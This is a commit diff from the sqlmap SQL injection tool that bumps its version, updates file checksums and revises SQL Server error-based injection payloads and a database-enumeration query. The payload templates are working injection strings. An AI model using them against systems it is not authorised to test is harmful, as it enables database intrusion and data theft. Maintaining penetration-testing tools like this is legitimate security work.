Fix for a bug reported privately by user (in some cases data has not been retrieved)

This commit is contained in:
Miroslav Stampar 2016-10-11 01:07:31 +02:00
parent 6130185ac6
commit 1b95dd2d9d
4 changed files with 9 additions and 9 deletions

View File

@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.10.26" VERSION = "1.0.10.27"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

View File

@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6 lib/core/readlineng.py
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
99a2b496b9d5b546b335653ca801153f lib/core/revision.py 99a2b496b9d5b546b335653ca801153f lib/core/revision.py
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
1b4a3f7d043a8ff800a42e2b5d926303 lib/core/settings.py df7fb6dc2b304d6e9bb7ef5c68c661a9 lib/core/settings.py
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
c3ace7874a536d801f308cf1fd03df99 lib/core/target.py c3ace7874a536d801f308cf1fd03df99 lib/core/target.py
@ -449,9 +449,9 @@ fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml 535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
a279656ea3fcb85c727249b02f828383 xml/livetests.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml
14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml 14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml
a9fdde4fda738a678ad2fa9fb718e833 xml/payloads/error_based.xml 5a4ec9aaac9129205b88f2a7df9ffb27 xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
1587a02322a96ac48973e782d6fedf73 xml/queries.xml 397c1fd44a0e3f9ecaec03739a54f16f xml/queries.xml

View File

@ -394,9 +394,9 @@
<risk>1</risk> <risk>1</risk>
<clause>1,9</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector> <vector>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request> <request>
<payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload> <payload>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -415,9 +415,9 @@
<risk>3</risk> <risk>3</risk>
<clause>1,9</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector> <vector>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request> <request>
<payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload> <payload>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>

View File

@ -181,7 +181,7 @@
<privileges/> <privileges/>
<roles/> <roles/>
<dbs> <dbs>
<inband query="SELECT name FROM master..sysdatabases" query2="SELECT DB_NAME(%d)"/> <inband query="SELECT DISTINCT(name) FROM master..sysdatabases" query2="SELECT DB_NAME(%d)"/>
<blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/> <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
</dbs> </dbs>
<tables> <tables>